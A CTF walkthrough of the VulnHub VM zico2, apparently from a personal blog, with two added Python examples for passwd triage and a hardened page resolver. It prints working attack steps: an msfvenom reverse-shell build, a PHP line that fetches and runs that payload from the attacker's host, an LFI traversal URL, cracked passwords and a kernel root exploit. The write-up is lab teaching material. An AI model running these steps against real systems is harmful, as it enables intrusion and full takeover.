CTF Walkthrough: zico2

Okay, let’s give an “intermediate” CTF a shot here. Not sure what makes it harder yet, but I’m excited to get going, so let’s do this!

This Boot2Root VM is “zico2”, available from VulnHub.

The goal of this CTF is to get root and read the flag file. This VM works without issue in VirtualBox 5. Have fun!

First, as usual, nmap. The -p- sweeps all 65535 TCP ports rather than the default top 1000, which is why this one takes almost half an hour even on a local VM.

root@kali:~# nmap -sV -T4 10.13.37.206 -p-

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-08 22:33 EST
Warning: 10.13.37.206 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.13.37.206
Host is up (0.00018s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  tcpwrapped
80/tcp    open  http       Apache httpd 2.2.22 ((Ubuntu))
111/tcp   open  rpcbind    2-4 (RPC #100000)
53380/tcp open  status     1 (RPC #100024)
MAC Address: 08:00:27:98:69:CA (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1664.24 seconds

We’ll start with port 80. (I started a brute force ssh run against port 22 in the background in the meantime, because you never know, but it came up with nothing.)

So let’s see what subdirectories gobuster comes up with.

root@kali:~# gobuster -u http://10.13.37.206 -w /usr/share/wordlists/dirb/big.txt 

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.13.37.206/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/big.txt
[+] Status codes : 200,204,301,302,307
=====================================================
/LICENSE (Status: 200)
/css (Status: 301)
/dbadmin (Status: 301)
/img (Status: 301)
/index (Status: 200)
/js (Status: 301)
/package (Status: 200)
/tools (Status: 200)
/vendor (Status: 301)
/view (Status: 200)
=====================================================

First, the root (http://10.13.37.206). Just the start of a site, nothing interesting… except that the page content is pulled in through view.php and a page parameter.

So, if it’s not obvious to you, that looks like a local file inclusion: if view.php hands the parameter straight to an include, a path-traversal string in page should let us read arbitrary files on the server. Trying it with /etc/passwd confirms it:

root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
bin:x:2:2:bin:/bin:/bin/sh 
sys:x:3:3:sys:/dev:/bin/sh 
sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/bin/sh 
man:x:6:12:man:/var/cache/man:/bin/sh 
lp:x:7:7:lp:/var/spool/lpd:/bin/sh 
mail:x:8:8:mail:/var/mail:/bin/sh 
news:x:9:9:news:/var/spool/news:/bin/sh 
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh 
proxy:x:13:13:proxy:/bin:/bin/sh 
www-data:x:33:33:www-data:/var/www:/bin/sh 
backup:x:34:34:backup:/var/backups:/bin/sh 
list:x:38:38:Mailing List Manager:/var/list:/bin/sh 
irc:x:39:39:ircd:/var/run/ircd:/bin/sh 
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh 
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh 
libuuid:x:100:101::/var/lib/libuuid:/bin/sh 
syslog:x:101:103::/home/syslog:/bin/false 
messagebus:x:102:105::/var/run/dbus:/bin/false 
ntp:x:103:108::/home/ntp:/bin/false 
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin 
vboxadd:x:999:1::/var/run/vboxadd:/bin/false 
statd:x:105:65534::/var/lib/nfs:/bin/false 
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false 
zico:x:1000:1000:,,,:/home/zico:/bin/bash 

Cool, that might end up being helpful. Plus now we have some account names: zico (UID 1000) is the only regular user with a login shell, and root is the only other one, which narrows down any further password guessing. Note the “x” in the password field, so the hashes live in /etc/shadow, which www-data can’t read through the LFI.
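The sort of triage I do on a leaked passwd file, as an added example that is not part of the original walkthrough. The listing embedded below is the one read from zico2 above; the UID range (1000 to 60000 for regular users) is the Debian/Ubuntu login.defs default and is an assumption about the target.

```python
"""Triage a leaked /etc/passwd: which accounts could a password guess log in as?

Added example, not code from the zico2 VM or the walkthrough. The passwd text
is the one retrieved from the target via view.php. UID_MIN/UID_MAX follow the
Debian/Ubuntu login.defs defaults (assumption about the target).
"""
from typing import List, NamedTuple

# Shells that refuse an interactive login; anything else is treated as usable.
NOLOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin", "/bin/sync"}
UID_MIN, UID_MAX = 1000, 60000   # regular-user UID range (assumption, login.defs default)

# Copied from the target's /etc/passwd as read through the LFI above.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
ntp:x:103:108::/home/ntp:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
statd:x:105:65534::/var/lib/nfs:/bin/false
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
zico:x:1000:1000:,,,:/home/zico:/bin/bash
"""


class Account(NamedTuple):
    name: str
    passwd: str   # 'x' means the hash is in /etc/shadow
    uid: int
    gid: int
    home: str
    shell: str


def parse_passwd(text: str) -> List[Account]:
    """Parse passwd(5) records; blank, commented and malformed lines are skipped."""
    accounts = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, pw, uid, gid, _gecos, home, shell = fields
        try:
            accounts.append(Account(name, pw, int(uid), int(gid), home, shell))
        except ValueError:
            continue  # non-numeric uid/gid: not a real record
    return accounts


def login_candidates(text: str) -> List[str]:
    """Accounts worth spending password guesses on: root, or a regular user
    (uid inside the login.defs range) whose shell allows interactive login.
    System accounts with /bin/sh (daemon, bin, ...) fall outside the UID range."""
    return [
        a.name
        for a in parse_passwd(text)
        if a.shell not in NOLOGIN_SHELLS and (a.uid == 0 or UID_MIN <= a.uid <= UID_MAX)
    ]


def uses_shadow(text: str) -> bool:
    """True when every record carries 'x': the hashes are in /etc/shadow,
    so a read-only LFI running as www-data will not reach them."""
    accounts = parse_passwd(text)
    return bool(accounts) and all(a.passwd == "x" for a in accounts)


if __name__ == "__main__":
    print("candidates:", login_candidates(PASSWD))  # ['root', 'zico']
    print("shadowed:", uses_shadow(PASSWD))
```

The UID filter is what keeps the old-Debian service accounts with /bin/sh (daemon, bin, games and friends) off the list; nobody is excluded because 65534 sits above UID_MAX.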

Checking out the other subdirectories, nothing else looks too interesting until I hit http://10.13.37.206/dbadmin/. Inside there’s a test_db.php file, which gives us a login page for PHPLiteAdmin v1.9.3.

A quick Google search shows that the default password is “admin”, and nothing in the setup process forces you to change it. Since there are a few unfinished web frameworks on this box, my guess is the sysadmin never finished setting everything up, so let’s try it. Although, who am I kidding, default passwords are always worth a guess anyway.

It worked!

Looking through everything that’s here, there are a couple of users (and their hashed passwords) in the test_users database, “info” table.

The hashes crack to “34kroot34” (for root) and “zico2215@” (for zico). (Spoiler: I ended up not needing these, but maybe you’ll find them useful in finding another way in.)

Okay, let’s see if PHPLiteAdmin 1.9.3 has any known vulnerabilities.

It looks like it does! Long story short, when you create a database you get to pick its file extension, and on this box the file is saved under “/usr/databases”. So create a database with a “.php” extension, then create a table in it with one text column whose default value is valid PHP code. That string is stored verbatim inside the SQLite file, so when the file is pulled into a “page” in the browser (via the view.php include we found earlier), the interpreter runs whatever PHP it finds. I’m not going to go into a ton of detail here, that’s what Google is for. 🙂

So I figured what I would do is the following:

  1. Create reverse shell executable to point back to my kali
  2. Share the executable via a python http server
  3. Start up a meterpreter listener
  4. Create some PHP code to download the executable, make it executable, and execute it to open the reverse shell
  5. Profit?

Step 1, create the reverse shell executable.

root@kali:~# msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=10.13.37.237 LPORT=443 -f elf -o /tmp/rshell
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: /tmp/rshell

Run the http server to host the file for download.

root@kali:/tmp# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 ...

Start meterpreter reverse TCP handler.

root@kali:/tmp# systemctl start postgresql
root@kali:/tmp# msfconsole -q
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
PAYLOAD => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.13.37.237
LHOST => 10.13.37.237
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > run
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 10.13.37.237:443 

Create the aforementioned database/table in PHPLiteAdmin with the following default value:

'<?php system("cd /tmp; wget http://10.13.37.237:8000/rshell; chmod 777 rshell; ./rshell"); ?>'

And then navigate to the following URL to run the PHP. The traversal walks out of the web root and into /usr/databases, which is where PHPLiteAdmin dropped the “database”:

http://10.13.37.206/view.php?page=../../../../usr/databases/rshell.php
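What that URL is doing, and the fix the application needed, as an added example that is not code from the zico2 VM or the walkthrough. view.php’s source is never shown, so the vulnerable resolver below is a model of the classic include-the-parameter pattern; /var/www as the document root and the allow-listed page names are assumptions.

```python
"""Model of the view.php include behind the LFI, beside a hardened resolver.

Added example, not the VM's code. Assumptions: DOCROOT is /var/www (the real
web root of zico2 is not shown) and ALLOWED_PAGES is a hypothetical allow-list.
Paths are handled with posixpath so this runs anywhere without touching disk.
"""
import posixpath

DOCROOT = "/var/www"                           # assumed document root
ALLOWED_PAGES = {"index.html", "tools.html"}   # hypothetical allow-list


class PageRejected(ValueError):
    """Raised by the hardened resolver for anything outside the allow-list."""


def traversal(target: str, depth: int = 4) -> str:
    """Build the page= value used in the walkthrough: enough '../' to reach /,
    then the absolute target. Extra '../' past the root are harmless, which is
    why attackers pile them on instead of counting directory levels."""
    return "../" * depth + target.lstrip("/")


def resolve_page_unsafe(page: str, docroot: str = DOCROOT) -> str:
    """The vulnerable behaviour: the parameter is joined onto the web root as-is,
    so '..' segments walk out of it and any readable file gets included."""
    return posixpath.normpath(posixpath.join(docroot, page))


def resolve_page_safe(page: str, docroot: str = DOCROOT) -> str:
    """Hardened resolver: reject NULs and absolute paths, normalise, require the
    result to stay under the document root, then require a known page name."""
    if "\x00" in page:                      # old PHP builds truncate at NUL
        raise PageRejected("null byte in page parameter")
    if posixpath.isabs(page):
        raise PageRejected("absolute path not allowed")
    resolved = posixpath.normpath(posixpath.join(docroot, page))
    if posixpath.commonpath([docroot, resolved]) != docroot:
        raise PageRejected("path escapes document root")
    if posixpath.relpath(resolved, docroot) not in ALLOWED_PAGES:
        raise PageRejected("page not in allow-list")
    return resolved


def rejects(page: str) -> bool:
    """True when the hardened resolver refuses the given page parameter."""
    try:
        resolve_page_safe(page)
    except PageRejected:
        return True
    return False


if __name__ == "__main__":
    payload = traversal("/usr/databases/rshell.php")
    print(payload, "->", resolve_page_unsafe(payload))   # /usr/databases/rshell.php
    print("hardened rejects it:", rejects(payload))       # True
    print("hardened allows index.html:", resolve_page_safe("index.html"))
```

The allow-list is the part that actually closes the hole; the prefix check alone still lets a user include any file under the web root, including the uploaded SQLite database if it had landed there.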

Meterpreter should now look something like this. You’ll have to hit enter, and then start the interaction with the session that was opened.

msf exploit(handler) > [*] Sending stage (847604 bytes) to 10.13.37.206
[*] Meterpreter session 1 opened (10.13.37.237:443 -> 10.13.37.206:54907) at 2017-11-09 06:03:40 -0500
<hit enter>
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

Start up a shell, then use Python to spawn a pty running bash. Partly because I like bash better, partly because the raw meterpreter shell is not a real terminal and a pty makes it behave. Then we check the kernel version; maybe there’s a privilege escalation exploit for it.

meterpreter > shell
Process 4407 created.
Channel 7 created.
python -c 'import pty; pty.spawn("/bin/bash");'
www-data@zico:/home/zico/wordpress$ cd /tmp
cd /tmp
www-data@zico:/tmp$ uname -a
uname -a
Linux zico 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux

Search exploit-db.com for the kernel version, and sure enough, there’s an exploit by “vnik” (EDB-ID 33589, the one in the URL below). Download it, compile it, and run it as per the instructions in the source. Two practical notes: kernel exploits can panic the box, so snapshot the VM first; and wget here only works because the target has outbound HTTPS. If it didn’t, fetch the source on kali and pull it over the python http server already running on port 8000.

www-data@zico:/tmp$ wget https://www.exploit-db.com/raw/33589/ -O vnik.c
wget https://www.exploit-db.com/raw/33589/ -O vnik.c
--2017-11-10 03:09:10--  https://www.exploit-db.com/raw/33589/
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3664 (3.6K) 
Saving to: `vnik.c'

100%[======================================>] 3,664       --.-K/s   in 0s      

2017-11-10 03:09:10 (313 MB/s) - `vnik.c' saved [3664/3664]

www-data@zico:/tmp$ gcc vnik.c -O2 -o vnik
gcc vnik.c -O2 -o vnik
www-data@zico:/tmp$ chmod 777 vnik
chmod 777 vnik
www-data@zico:/tmp$ ./vnik 0
./vnik 0
IDT addr = 0xffffffff81dd7000
Using int = 3 with offset = -49063
root@zico:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root)
root@zico:/tmp# ls /root
ls /root
flag.txt
root@zico:/tmp# cat /root/flag.txt
cat /root/flag.txt
#
#
#
# ROOOOT!
# You did it! Congratz!
# 
# Hope you enjoyed! 
# 
# 
#
#

And done! That wasn’t too hard! I did enjoy it though.

Until next time!